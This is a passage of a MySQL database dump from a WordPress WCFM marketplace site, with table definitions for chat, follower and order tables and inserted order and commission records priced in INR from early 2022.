  `receive_copy` tinyint(1) NOT NULL DEFAULT 0,
  UNIQUE KEY `conversation_id` (`conversation_id`),
  KEY `created_at` (`created_at`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcfm_fbc_chat_sessions`
--

LOCK TABLES `wp_wcfm_fbc_chat_sessions` WRITE;
/*!40000 ALTER TABLE `wp_wcfm_fbc_chat_sessions` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wcfm_fbc_chat_sessions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcfm_fbc_chat_visitors`
--

DROP TABLE IF EXISTS `wp_wcfm_fbc_chat_visitors`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcfm_fbc_chat_visitors` (
  `user_id` varchar(30) NOT NULL DEFAULT '',
  `user_type` varchar(12) NOT NULL DEFAULT '',
  `user_name` varchar(32) DEFAULT NULL,
  `user_ip` int(11) unsigned DEFAULT NULL,
  `user_email` varchar(90) DEFAULT NULL,
  `last_online` bigint(13) unsigned DEFAULT NULL,
  `vendor_id` varchar(30) NOT NULL DEFAULT '',
  UNIQUE KEY `user_id` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcfm_fbc_chat_visitors`
--

LOCK TABLES `wp_wcfm_fbc_chat_visitors` WRITE;
/*!40000 ALTER TABLE `wp_wcfm_fbc_chat_visitors` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wcfm_fbc_chat_visitors` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcfm_fbc_offline_messages`
--

DROP TABLE IF EXISTS `wp_wcfm_fbc_offline_messages`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcfm_fbc_offline_messages` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `user_name` longtext NOT NULL,
  `user_email` longtext NOT NULL,
  `user_message` longtext NOT NULL,
  `user_info` longtext NOT NULL,
  `mail_date` date NOT NULL DEFAULT '0000-00-00',
  `mail_read` tinyint(1) NOT NULL DEFAULT 0,
  `vendor_id` varchar(30) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcfm_fbc_offline_messages`
--

LOCK TABLES `wp_wcfm_fbc_offline_messages` WRITE;
/*!40000 ALTER TABLE `wp_wcfm_fbc_offline_messages` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wcfm_fbc_offline_messages` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcfm_following_followers`
--

DROP TABLE IF EXISTS `wp_wcfm_following_followers`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcfm_following_followers` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) NOT NULL DEFAULT 0,
  `user_name` varchar(200) NOT NULL,
  `user_email` varchar(200) NOT NULL,
  `follower_id` bigint(20) NOT NULL DEFAULT 0,
  `follower_name` varchar(200) NOT NULL,
  `follower_email` varchar(200) NOT NULL,
  `notify` tinyint(1) NOT NULL DEFAULT 1,
  `posted` timestamp NOT NULL DEFAULT current_timestamp(),
  PRIMARY KEY (`ID`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcfm_following_followers`
--

LOCK TABLES `wp_wcfm_following_followers` WRITE;
/*!40000 ALTER TABLE `wp_wcfm_following_followers` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wcfm_following_followers` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcfm_marketplace_orders`
--

DROP TABLE IF EXISTS `wp_wcfm_marketplace_orders`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcfm_marketplace_orders` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `vendor_id` bigint(20) NOT NULL,
  `order_id` bigint(20) NOT NULL,
  `customer_id` bigint(20) NOT NULL,
  `payment_method` varchar(255) NOT NULL,
  `product_id` bigint(20) NOT NULL,
  `variation_id` bigint(20) NOT NULL DEFAULT 0,
  `quantity` bigint(20) NOT NULL DEFAULT 1,
  `product_price` varchar(255) DEFAULT '0',
  `purchase_price` varchar(20) NOT NULL DEFAULT '0',
  `item_id` bigint(20) NOT NULL,
  `item_type` varchar(255) DEFAULT NULL,
  `item_sub_total` varchar(255) DEFAULT '0',
  `item_total` varchar(255) DEFAULT '0',
  `shipping` varchar(255) NOT NULL DEFAULT '0',
  `tax` varchar(255) NOT NULL DEFAULT '0',
  `shipping_tax_amount` varchar(255) NOT NULL DEFAULT '0',
  `commission_amount` varchar(255) NOT NULL DEFAULT '0',
  `discount_amount` varchar(255) NOT NULL DEFAULT '0',
  `discount_type` varchar(255) NOT NULL,
  `other_amount` varchar(255) NOT NULL DEFAULT '0',
  `other_amount_type` varchar(255) NOT NULL,
  `withdrawal_id` bigint(20) NOT NULL DEFAULT 0,
  `refunded_id` bigint(20) NOT NULL DEFAULT 0,
  `refunded_amount` varchar(255) NOT NULL DEFAULT '0',
  `withdraw_charges` varchar(255) NOT NULL DEFAULT '0',
  `total_commission` varchar(255) NOT NULL DEFAULT '0',
  `order_status` varchar(255) NOT NULL,
  `shipping_status` varchar(255) NOT NULL DEFAULT 'pending',
  `commission_status` varchar(100) NOT NULL DEFAULT 'pending',
  `withdraw_status` varchar(100) NOT NULL DEFAULT 'pending',
  `refund_status` varchar(100) NOT NULL DEFAULT 'pending',
  `is_refunded` tinyint(1) NOT NULL DEFAULT 0,
  `is_partially_refunded` tinyint(1) NOT NULL DEFAULT 0,
  `is_withdrawable` tinyint(1) NOT NULL DEFAULT 0,
  `is_auto_withdrawal` tinyint(1) NOT NULL DEFAULT 0,
  `is_trashed` tinyint(1) NOT NULL DEFAULT 0,
  `commission_paid_date` timestamp NULL DEFAULT NULL,
  `created` timestamp NOT NULL DEFAULT current_timestamp(),
  PRIMARY KEY (`ID`),
  UNIQUE KEY `marketplace_orders` (`order_id`,`vendor_id`,`item_id`)
) ENGINE=InnoDB AUTO_INCREMENT=38 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcfm_marketplace_orders`
--

LOCK TABLES `wp_wcfm_marketplace_orders` WRITE;
/*!40000 ALTER TABLE `wp_wcfm_marketplace_orders` DISABLE KEYS */;
INSERT INTO `wp_wcfm_marketplace_orders` VALUES (1,20,1002,21,'razorpay',1000,0,1,'400','400',10,'line_item','400','400','25','0','0','360','0','','0','',0,0,'0','0','385','completed','pending','completed','pending','pending',0,0,1,0,0,NULL,'2022-02-24 05:11:57'),(2,22,1005,20,'razorpay',1004,0,1,'222','222',13,'line_item','222','222','25','0','0','199.8','0','','0','',0,0,'0','0','224.8','processing','pending','processing','pending','pending',0,0,1,0,0,NULL,'2022-02-24 10:07:15'),(3,22,1008,21,'razorpay',1004,0,1,'222','222',16,'line_item','222','222','25','0','0','199.8','0','','0','',0,0,'0','0','224.8','cancel-request','pending','cancel-request','pending','pending',0,0,1,0,0,NULL,'2022-02-25 04:03:41'),(4,2,1008,21,'razorpay',596,0,1,'46','46',17,'line_item','46','46','25','0','0','41.4','0','','0','',0,0,'0','0','66.4','cancel-request','pending','cancel-request','pending','pending',0,0,1,0,0,NULL,'2022-02-25 04:03:41'),(5,2,1012,21,'razorpay',532,0,2,'140','140',20,'line_item','280','280','0','0','0','252','0','','0','',0,0,'0','0','252','completed','pending','completed','pending','pending',0,0,1,0,0,NULL,'2022-02-25 05:37:47'),(6,20,1012,21,'razorpay',1000,0,1,'400','400',21,'line_item','400','400','0','0','0','360','0','','0','',0,0,'0','0','360','completed','pending','completed','pending','pending',0,0,1,0,0,NULL,'2022-02-25 05:37:47'),(7,2,1013,21,'razorpay',532,0,1,'140','140',24,'line_item','140','140','25','0','0','126','0','','0','',0,0,'0','0','151','cancelled','pending','cancelled','pending','pending',0,0,1,0,1,NULL,'2022-02-25 06:34:23'),(8,20,1016,21,'razorpay',1001,0,1,'500','500',27,'line_item','500','500','0','0','0','450','0','','0','',0,0,'0','0','450','completed','pending','completed','pending','pending',0,0,1,0,0,NULL,'2022-02-25 11:09:01'),(9,22,1016,21,'razorpay',1004,0,1,'222','222',28,'line_item','222','222','0','0','0','199.8','0','','0','',0,0,'0','0','199.8','completed','pending','completed','pending','pending',0,0,1,0,0,NULL,'2022-02-25 11:09:01'),(10,20,1016,21,'razorpay',1000,0,1,'400','400',29,'line_item','400','400','0','0','0','360','0','','0','',0,0,'0','0','360','completed','pending','completed','pending','pending',0,0,1,0,0,NULL,'2022-02-25 11:09:01'),(11,20,1017,21,'razorpay',1000,0,1,'400','400',47,'line_item','400','400','0','0','0','360','0','','0','',0,0,'0','0','360','cancelled','pending','cancelled','pending','pending',0,0,1,0,1,NULL,'2022-02-25 11:24:49'),(12,22,1017,21,'razorpay',1004,0,1,'222','222',48,'line_item','222','222','0','0','0','199.8','0','','0','',0,0,'0','0','199.8','cancelled','pending','cancelled','pending','pending',0,0,1,0,1,NULL,'2022-02-25 11:24:49'),(13,22,1018,21,'razorpay',1004,0,1,'222','222',53,'line_item','222','222','0','0','0','199.8','0','','0','',0,0,'0','0','199.8','completed','pending','completed','pending','pending',0,0,1,0,0,NULL,'2022-03-03 05:04:03'),(14,25,1022,21,'razorpay',1020,0,1,'123','123',55,'line_item','123','123','25','0','0','110.7','0','','0','',0,0,'0','0','135.7','completed','pending','completed','pending','pending',0,0,1,0,0,NULL,'2022-03-03 05:26:23'),(15,2,1023,21,'razorpay',590,0,1,'80','80',59,'line_item','80','80','25','0','0','72','0','','0','',0,0,'0','0','97','cancel-request','pending','cancel-request','pending','pending',0,0,1,0,0,NULL,'2022-03-03 05:32:37'),(16,25,1023,21,'razorpay',1020,0,1,'123','123',60,'line_item','123','123','25','0','0','110.7','0','','0','',0,0,'0','0','135.7','cancel-request','pending','cancel-request','pending','pending',0,0,1,0,0,NULL,'2022-03-03 05:32:37'),(17,25,1195,26,'razorpay',1194,0,1,'100','100',63,'line_item','100','100','20','0','0','90','0','','0','',0,0,'0','0','110','completed','pending','completed','pending','pending',0,0,1,0,0,NULL,'2022-03-07 06:24:07'),(18,21,1195,26,'razorpay',1159,0,1,'95','95',64,'line_item','95','95','20','0','0','85.5','0','','0','',0,0,'0','0','105.5','completed','pending','completed','pending','pending',0,0,1,0,0,NULL,'2022-03-07 06:24:07'),(19,21,1196,1,'razorpay',1159,0,2,'95','95',67,'line_item','190','190','10','0','0','171','0','','0','',0,0,'0','0','181','processing','pending','processing','pending','pending',0,0,1,0,0,NULL,'2022-03-07 07:06:45'),(20,21,1196,1,'razorpay',1163,0,2,'95','95',68,'line_item','190','190','10','0','0','171','0','','0','',0,0,'0','0','181','processing','pending','processing','pending','pending',0,0,1,0,0,NULL,'2022-03-07 07:06:45'),(21,25,1196,1,'razorpay',1194,0,1,'100','100',69,'line_item','100','100','20','0','0','90','0','','0','',0,0,'0','0','110','processing','pending','processing','pending','pending',0,0,1,0,0,NULL,'2022-03-07 07:06:45'),(22,21,1197,1,'razorpay',1069,0,1,'499','499',72,'line_item','499','499','20','0','0','449.1','0','','0','',0,0,'0','0','469.1','processing','pending','processing','pending','pending',0,0,1,0,0,NULL,'2022-03-07 07:18:14'),(23,21,1198,26,'razorpay',1165,0,1,'95','95',74,'line_item','95','95','10','0','0','85.5','0','','0','',0,0,'0','0','95.5','processing','pending','processing','pending','pending',0,0,1,0,0,NULL,'2022-03-07 07:20:37'),(24,21,1198,26,'razorpay',1107,0,1,'38','38',75,'line_item','38','38','10','0','0','34.2','0','','0','',0,0,'0','0','44.2','processing','pending','processing','pending','pending',0,0,1,0,0,NULL,'2022-03-07 07:20:37'),(25,21,1199,26,'razorpay',1165,0,1,'95','95',77,'line_item','95','95','20','0','0','85.5','0','','0','',0,0,'0','0','105.5','processing','pending','processing','pending','pending',0,0,1,0,0,NULL,'2022-03-07 07:23:04'),(26,25,1199,26,'razorpay',1194,0,1,'100','100',78,'line_item','100','100','20','0','0','90','0','','0','',0,0,'0','0','110','processing','pending','processing','pending','pending',0,0,1,0,0,NULL,'2022-03-07 07:23:04'),(27,25,1200,26,'razorpay',1194,0,1,'100','100',81,'line_item','100','100','20','0','0','90','0','','0','',0,0,'0','0','110','processing','pending','processing','pending','pending',0,0,1,0,0,NULL,'2022-03-07 07:34:47'),(28,25,1201,26,'razorpay',1194,0,1,'100','100',83,'line_item','100','100','0','0','0','90','0','','0','',0,0,'0','0','90','processing','pending','processing','pending','pending',0,0,1,0,0,NULL,'2022-03-07 09:34:34'),(29,21,1201,26,'razorpay',1159,0,1,'95','95',84,'line_item','95','95','10','0','0','85.5','0','','0','',0,0,'0','0','95.5','processing','pending','completed','pending','pending',0,0,1,0,0,NULL,'2022-03-07 09:34:34'),(30,25,1202,1,'razorpay',1194,0,1,'100','100',87,'line_item','100','100','0','0','0','90','0','','0','',0,0,'0','0','90','cancelled','pending','cancelled','pending','pending',0,0,1,0,1,NULL,'2022-03-07 10:15:25'),(31,21,1202,1,'razorpay',1116,0,1,'499','499',88,'line_item','499','499','10','0','0','449.1','0','','0','',0,0,'0','0','459.1','cancelled','pending','cancelled','pending','pending',0,0,1,0,1,NULL,'2022-03-07 10:15:25'),(33,28,1277,29,'razorpay',1276,0,1,'598','598',95,'line_item','598','598','0','0','0','538.2','0','','0','',0,0,'0','0','538.2','completed','pending','completed','pending','pending',0,0,1,0,0,NULL,'2022-03-15 07:47:05'),(34,28,1278,29,'cod',1276,0,1,'598','598',101,'line_item','598','598','0','0','0','538.2','0','','0','',0,0,'0','0','538.2','processing','pending','processing','pending','pending',0,0,1,0,0,NULL,'2022-03-15 07:50:57'),(35,25,1278,29,'cod',1194,0,1,'999','999',102,'line_item','999','999','0','0','0','899.1','0','','0','',0,0,'0','0','899.1','processing','pending','completed','pending','pending',0,0,1,0,0,NULL,'2022-03-15 07:50:57'),(36,25,1279,29,'cod',1194,0,1,'999','999',105,'line_item','999','999','30','0','0','899.1','0','','0','',0,0,'0','0','929.1','completed','pending','completed','pending','pending',0,0,1,0,0,NULL,'2022-03-15 07:58:20'),(37,25,1280,29,'cod',1194,0,1,'999','999',107,'line_item','999','999','30','0','0','899.1','0','','0','',0,0,'0','0','929.1','processing','pending','processing','pending','pending',0,0,1,0,0,NULL,'2022-03-15 08:02:38');
/*!40000 ALTER TABLE `wp_wcfm_marketplace_orders` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcfm_marketplace_orders_meta`
--

DROP TABLE IF EXISTS `wp_wcfm_marketplace_orders_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcfm_marketplace_orders_meta` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `order_commission_id` bigint(20) NOT NULL DEFAULT 0,
  `key` varchar(200) NOT NULL,
  `value` longtext NOT NULL,
  PRIMARY KEY (`ID`)
) ENGINE=InnoDB AUTO_INCREMENT=334 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcfm_marketplace_orders_meta`
--

LOCK TABLES `wp_wcfm_marketplace_orders_meta` WRITE;
/*!40000 ALTER TABLE `wp_wcfm_marketplace_orders_meta` DISABLE KEYS */;
INSERT INTO `wp_wcfm_marketplace_orders_meta` VALUES (1,1,'currency','INR'),(2,1,'gross_total','425'),(3,1,'gross_sales_total','425'),(4,1,'gross_shipping_cost','25'),(5,1,'gross_shipping_tax','0'),(6,1,'gross_tax_cost','0'),(7,1,'commission_tax','0'),(8,1,'transaction_charge','0'),(9,1,'commission_rule','a:12:{s:4:\"rule\";s:7:\"percent\";s:4:\"mode\";s:7:\"percent\";s:7:\"percent\";s:2:\"90\";s:5:\"fixed\";i:0;s:10:\"tax_enable\";s:3:\"yes\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";s:23:\"transaction_charge_type\";s:2:\"no\";s:26:\"transaction_charge_percent\";s:1:\"0\";s:24:\"transaction_charge_fixed\";s:1:\"0\";s:22:\"transaction_charge_tax\";s:1:\"0\";s:13:\"coupon_deduct\";s:3:\"yes\";}'),(10,2,'currency','INR'),(11,2,'gross_total','247'),(12,2,'gross_sales_total','247'),(13,2,'gross_shipping_cost','25'),(14,2,'gross_shipping_tax','0'),(15,2,'gross_tax_cost','0'),(16,2,'commission_tax','0'),(17,2,'transaction_charge','0'),(18,2,'commission_rule','a:12:{s:4:\"rule\";s:7:\"percent\";s:4:\"mode\";s:7:\"percent\";s:7:\"percent\";s:2:\"90\";s:5:\"fixed\";i:0;s:10:\"tax_enable\";s:3:\"yes\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";s:23:\"transaction_charge_type\";s:2:\"no\";s:26:\"transaction_charge_percent\";s:1:\"0\";s:24:\"transaction_charge_fixed\";s:1:\"0\";s:22:\"transaction_charge_tax\";s:1:\"0\";s:13:\"coupon_deduct\";s:3:\"yes\";}'),(19,3,'currency','INR'),(20,3,'gross_total','247'),(21,3,'gross_sales_total','247'),(22,3,'gross_shipping_cost','25'),(23,3,'gross_shipping_tax','0'),(24,3,'gross_tax_cost','0'),(25,3,'commission_tax','0'),(26,3,'transaction_charge','0'),(27,3,'commission_rule','a:12:{s:4:\"rule\";s:7:\"percent\";s:4:\"mode\";s:7:\"percent\";s:7:\"percent\";s:2:\"90\";s:5:\"fixed\";i:0;s:10:\"tax_enable\";s:3:\"yes\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";s:23:\"transaction_charge_type\";s:2:\"no\";s:26:\"transaction_charge_percent\";s:1:\"0\";s:24:\"transaction_charge_fixed\";s:1:\"0\";s:22:\"transaction_charge_tax\";s:1:\"0\";s:13:\"coupon_deduct\";s:3:\"yes\";}'),(28,4,'currency','INR'),(29,4,'gross_total','71'),(30,4,'gross_sales_total','71'),(31,4,'gross_shipping_cost','25'),(32,4,'gross_shipping_tax','0'),(33,4,'gross_tax_cost','0'),(34,4,'commission_tax','0'),(35,4,'transaction_charge','0'),(36,4,'commission_rule','a:12:{s:4:\"rule\";s:7:\"percent\";s:4:\"mode\";s:7:\"percent\";s:7:\"percent\";s:2:\"90\";s:5:\"fixed\";i:0;s:10:\"tax_enable\";s:3:\"yes\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";s:23:\"transaction_charge_type\";s:2:\"no\";s:26:\"transaction_charge_percent\";s:1:\"0\";s:24:\"transaction_charge_fixed\";s:1:\"0\";s:22:\"transaction_charge_tax\";s:1:\"0\";s:13:\"coupon_deduct\";s:3:\"yes\";}'),(37,5,'currency','INR'),(38,5,'gross_total','280'),(39,5,'gross_sales_total','280'),(40,5,'gross_shipping_cost','0'),(41,5,'gross_shipping_tax','0'),(42,5,'gross_tax_cost','0'),(43,5,'commission_tax','0'),(44,5,'transaction_charge','0'),(45,5,'commission_rule','a:12:{s:4:\"rule\";s:7:\"percent\";s:4:\"mode\";s:7:\"percent\";s:7:\"percent\";s:2:\"90\";s:5:\"fixed\";i:0;s:10:\"tax_enable\";s:3:\"yes\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";s:23:\"transaction_charge_type\";s:2:\"no\";s:26:\"transaction_charge_percent\";s:1:\"0\";s:24:\"transaction_charge_fixed\";s:1:\"0\";s:22:\"transaction_charge_tax\";s:1:\"0\";s:13:\"coupon_deduct\";s:3:\"yes\";}'),(46,6,'currency','INR'),(47,6,'gross_total','400'),(48,6,'gross_sales_total','400'),(49,6,'gross_shipping_cost','0'),(50,6,'gross_shipping_tax','0'),(51,6,'gross_tax_cost','0'),(52,6,'commission_tax','0'),(53,6,'transaction_charge','0'),(54,6,'commission_rule','a:12:{s:4:\"rule\";s:7:\"percent\";s:4:\"mode\";s:7:\"percent\";s:7:\"percent\";s:2:\"90\";s:5:\"fixed\";i:0;s:10:\"tax_enable\";s:3:\"yes\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";s:23:\"transaction_charge_type\";s:2:\"no\";s:26:\"transaction_charge_percent\";s:1:\"0\";s:24:\"transaction_charge_fixed\";s:1:\"0\";s:22:\"transaction_charge_tax\";s:1:\"0\";s:13:\"coupon_deduct\";s:3:\"yes\";}'),(55,7,'currency','INR'),(56,7,'gross_total','165'),(57,7,'gross_sales_total','165'),(58,7,'gross_shipping_cost','25'),(59,7,'gross_shipping_tax','0'),(60,7,'gross_tax_cost','0'),(61,7,'commission_tax','0'),(62,7,'transaction_charge','0'),(63,7,'commission_rule','a:12:{s:4:\"rule\";s:7:\"percent\";s:4:\"mode\";s:7:\"percent\";s:7:\"percent\";s:2:\"90\";s:5:\"fixed\";i:0;s:10:\"tax_enable\";s:3:\"yes\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";s:23:\"transaction_charge_type\";s:2:\"no\";s:26:\"transaction_charge_percent\";s:1:\"0\";s:24:\"transaction_charge_fixed\";s:1:\"0\";s:22:\"transaction_charge_tax\";s:1:\"0\";s:13:\"coupon_deduct\";s:3:\"yes\";}'),(64,8,'currency','INR'),(65,8,'gross_total','500'),(66,8,'gross_sales_total','500'),(67,8,'gross_shipping_cost','0'),(68,8,'gross_shipping_tax','0'),(69,8,'gross_tax_cost','0'),(70,8,'commission_tax','0'),(71,8,'transaction_charge','0'),(72,8,'commission_rule','a:12:{s:4:\"rule\";s:7:\"percent\";s:4:\"mode\";s:7:\"percent\";s:7:\"percent\";s:2:\"90\";s:5:\"fixed\";i:0;s:10:\"tax_enable\";s:3:\"yes\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";s:23:\"transaction_charge_type\";s:2:\"no\";s:26:\"transaction_charge_percent\";s:1:\"0\";s:24:\"transaction_charge_fixed\";s:1:\"0\";s:22:\"transaction_charge_tax\";s:1:\"0\";s:13:\"coupon_deduct\";s:3:\"yes\";}'),(73,9,'currency','INR'),(74,9,'gross_total','222'),(75,9,'gross_sales_total','222'),(76,9,'gross_shipping_cost','0'),(77,9,'gross_shipping_tax','0'),(78,9,'gross_tax_cost','0'),(79,9,'commission_tax','0'),(80,9,'transaction_charge','0'),(81,9,'commission_rule','a:12:{s:4:\"rule\";s:7:\"percent\";s:4:\"mode\";s:7:\"percent\";s:7:\"percent\";s:2:\"90\";s:5:\"fixed\";i:0;s:10:\"tax_enable\";s:3:\"yes\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";s:23:\"transaction_charge_type\";s:2:\"no\";s:26:\"transaction_charge_percent\";s:1:\"0\";s:24:\"transaction_charge_fixed\";s:1:\"0\";s:22:\"transaction_charge_tax\";s:1:\"0\";s:13:\"coupon_deduct\";s:3:\"yes\";}'),(82,10,'currency','INR'),(83,10,'gross_total','400'),(84,10,'gross_sales_total','400'),(85,10,'gross_shipping_cost','0'),(86,10,'gross_shipping_tax','0'),(87,10,'gross_tax_cost','0'),(88,10,'commission_tax','0'),(89,10,'transaction_charge','0'),(90,10,'commission_rule','a:12:{s:4:\"rule\";s:7:\"percent\";s:4:\"mode\";s:7:\"percent\";s:7:\"percent\";s:2:\"90\";s:5:\"fixed\";i:0;s:10:\"tax_enable\";s:3:\"yes\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";s:23:\"transaction_charge_type\";s:2:\"no\";s:26:\"transaction_charge_percent\";s:1:\"0\";s:24:\"transaction_charge_fixed\";s:1:\"0\";s:22:\"transaction_charge_tax\";s:1:\"0\";s:13:\"coupon_deduct\";s:3:\"yes\";}'),(91,11,'currency','INR'),(92,11,'gross_total','400'),(93,11,'gross_sales_total','400'),(94,11,'gross_shipping_cost','0'),(95,11,'gross_shipping_tax','0'),(96,11,'gross_tax_cost','0'),(97,11,'commission_tax','0'),(98,11,'transaction_charge','0'),(99,11,'commission_rule','a:12:{s:4:\"rule\";s:7:\"percent\";s:4:\"mode\";s:7:\"percent\";s:7:\"percent\";s:2:\"90\";s:5:\"fixed\";i:0;s:10:\"tax_enable\";s:3:\"yes\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";s:23:\"transaction_charge_type\";s:2:\"no\";s:26:\"transaction_charge_percent\";s:1:\"0\";s:24:\"transaction_charge_fixed\";s:1:\"0\";s:22:\"transaction_charge_tax\";s:1:\"0\";s:13:\"coupon_deduct\";s:3:\"yes\";}'),(100,12,'currency','INR'),(101,12,'gross_total','222'),(102,12,'gross_sales_total','222'),(103,12,'gross_shipping_cost','0'),(104,12,'gross_shipping_tax','0'),(105,12,'gross_tax_cost','0'),(106,12,'commission_tax','0'),(107,12,'transaction_charge','0'),(108,12,'commission_rule','a:12:{s:4:\"rule\";s:7:\"percent\";s:4:\"mode\";s:7:\"percent\";s:7:\"percent\";s:2:\"90\";s:5:\"fixed\";i:0;s:10:\"tax_enable\";s:3:\"yes\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";s:23:\"transaction_charge_type\";s:2:\"no\";s:26:\"transaction_charge_percent\";s:1:\"0\";s:24:\"transaction_charge_fixed\";s:1:\"0\";s:22:\"transaction_charge_tax\";s:1:\"0\";s:13:\"coupon_deduct\";s:3:\"yes\";}'),(109,13,'currency','INR'),(110,13,'gross_total','222'),(111,13,'gross_sales_total','222'),(112,13,'gross_shipping_cost','0'),(113,13,'gross_shipping_tax','0'),(114,13,'gross_tax_cost','0'),(115,13,'commission_tax','0'),(116,13,'transaction_charge','0'),(117,13,'commission_rule','a:12:{s:4:\"rule\";s:7:\"percent\";s:4:\"mode\";s:7:\"percent\";s:7:\"percent\";s:2:\"90\";s:5:\"fixed\";i:0;s:10:\"tax_enable\";s:3:\"yes\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";s:23:\"transaction_charge_type\";s:2:\"no\";s:26:\"transaction_charge_percent\";s:1:\"0\";s:24:\"transaction_charge_fixed\";s:1:\"0\";s:22:\"transaction_charge_tax\";s:1:\"0\";s:13:\"coupon_deduct\";s:3:\"yes\";}'),(118,14,'currency','INR'),(119,14,'gross_total','148'),(120,14,'gross_sales_total','148'),(121,14,'gross_shipping_cost','25'),(122,14,'gross_shipping_tax','0'),(123,14,'gross_tax_cost','0'),(124,14,'commission_tax','0'),(125,14,'transaction_charge','0'),(126,14,'commission_rule','a:12:{s:4:\"rule\";s:7:\"percent\";s:4:\"mode\";s:7:\"percent\";s:7:\"percent\";s:2:\"90\";s:5:\"fixed\";i:0;s:10:\"tax_enable\";s:3:\"yes\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";s:23:\"transaction_charge_type\";s:2:\"no\";s:26:\"transaction_charge_percent\";s:1:\"0\";s:24:\"transaction_charge_fixed\";s:1:\"0\";s:22:\"transaction_charge_tax\";s:1:\"0\";s:13:\"coupon_deduct\";s:3:\"yes\";}'),(127,15,'currency','INR'),(128,15,'gross_total','105'),(129,15,'gross_sales_total','105'),(130,15,'gross_shipping_cost','25'),(131,15,'gross_shipping_tax','0'),(132,15,'gross_tax_cost','0'),(133,15,'commission_tax','0'),(134,15,'transaction_charge','0'),(135,15,'commission_rule','a:12:{s:4:\"rule\";s:7:\"percent\";s:4:\"mode\";s:7:\"percent\";s:7:\"percent\";s:2:\"90\";s:5:\"fixed\";i:0;s:10:\"tax_enable\";s:3:\"yes\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";s:23:\"transaction_charge_type\";s:2:\"no\";s:26:\"transaction_charge_percent\";s:1:\"0\";s:24:\"transaction_charge_fixed\";s:1:\"0\";s:22:\"transaction_charge_tax\";s:1:\"0\";s:13:\"coupon_deduct\";s:3:\"yes\";}'),(136,16,'currency','INR'),(137,16,'gross_total','148'),(138,16,'gross_sales_total','148'),(139,16,'gross_shipping_cost','25'),(140,16,'gross_shipping_tax','0'),(141,16,'gross_tax_cost','0'),(142,16,'commission_tax','0'),(143,16,'transaction_charge','0'),(144,16,'commission_rule','a:12:{s:4:\"rule\";s:7:\"percent\";s:4:\"mode\";s:7:\"percent\";s:7:\"percent\";s:2:\"90\";s:5:\"fixed\";i:0;s:10:\"tax_enable\";s:3:\"yes\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";s:23:\"transaction_charge_type\";s:2:\"no\";s:26:\"transaction_charge_percent\";s:1:\"0\";s:24:\"transaction_charge_fixed\";s:1:\"0\";s:22:\"transaction_charge_tax\";s:1:\"0\";s:13:\"coupon_deduct\";s:3:\"yes\";}'),(145,17,'currency','INR'),(146,17,'gross_total','120'),(147,17,'gross_sales_total','120'),(148,17,'gross_shipping_cost','20'),(149,17,'gross_shipping_tax','0'),(150,17,'gross_tax_cost','0'),(151,17,'commission_tax','0'),(152,17,'transaction_charge','0'),(153,